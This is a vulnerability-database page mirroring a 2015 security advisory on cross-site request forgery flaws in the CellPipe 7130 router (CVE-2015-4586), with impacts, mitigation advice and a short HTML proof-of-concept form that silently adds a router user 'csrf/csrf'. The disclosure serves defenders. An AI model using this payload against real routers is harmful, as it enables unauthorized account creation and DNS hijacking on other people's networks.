Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CellPipe 7130 Cross Site Request Forgery

🗓️ 16 Jun 2015 00:00:00Reported by Dionisia LeratakiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

CellPipe 7130 RG 5Ae. M2013 HOL CSRF vulnerability with DNS Hijacking, Service Exposure, and User Account Creatio

Related
Code
ReporterTitlePublishedViews
Family
CNVD		Alcatel-Lucent CellPipe 7130 RG 5Ae.M2013 HOL Cross-Site Request Forgery Vulnerability
26 Jun 201500:00
cnvd
CVE		CVE-2015-4586
23 Jun 201514:00
cve
Cvelist		CVE-2015-4586
23 Jun 201514:00
cvelist
EUVD		EUVD-2015-4606
7 Oct 202500:30
euvd
NVD		CVE-2015-4586
23 Jun 201514:59
nvd
Prion		Cross site request forgery (csrf)
23 Jun 201514:59
prion
`CellPipe Router CSRF vulnerability  
  
Device model : CellPipe 7130 RG 5Ae. M2013 HOL  
*Software Version:* : *1.0.0.20h.HOL*  
CWE: 352 - https://cwe.mitre.org/data/definitions/352.html  
CVE: CVE-2015-4586  
Date: 16/06/2015  
Discovered by: Dionisia Lerataki  
(https://gr.linkedin.com/pub/dionisia-lerataki/88/18/891)  
  
  
Vulnerability type: Multiple CSRF vulnerabilities in the router's web  
interface  
  
CSRF (Cross Site Request Forgery) is an attack which forces an end user to  
execute unwanted actions on a web application in which he/she is currently  
authenticated. It is currently included in the OWASP Top 10 project.  
  
Exploitation and Impact:  
  
The exploitation of the above vulnerabilities, in addition with a social  
engineering  
attack, may lead to :  
  
• Unwanted service exposure  
• DNS Hijacking  
• Disabling wireless security  
• User account creation  
  
I have tested the scenario with the user account creation and the proof of  
concept is the following:  
  
<html>  
<body>  
<form action="http://192.168.1.1/password.cmd  
<http://192.168.2.1/password.cmd>">  
<input type="hidden" name="action" value="add_user" />  
<input type="hidden" name="userAdd" value="csrf" />  
<input type="hidden" name="pwdAdd" value="csrf" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
If a router administrator executes the above code a user with credentials  
(csrf/csrf) will be added.  
In our PoC the administrator must press the Submit request but in a real  
attack scenario an attacker can implement an auto submit javascript code.  
  
In our case the router IP address is: 192.168.1.1. Of course it can be  
exploited with the router's public IP address.  
  
Suggested mitigation:  
  
In order to properly patch the CSRF vulnerability the following measures  
have to be  
taken:  
  
• Add a randomly generated token associated with the user's session in order  
to prevent a CSRF attack. Alternatively a check to the referer header can be  
introduced. Although referer headers can be easily spoofed, they can  
prevent a CSRF attack of this kind.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Jun 2015 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.00118
cellpipe 7130 rg 5aecsrf vulnerabilitydns hijackingservice exposureuser account creationowasp top 10mitigationdionisia lerataki
46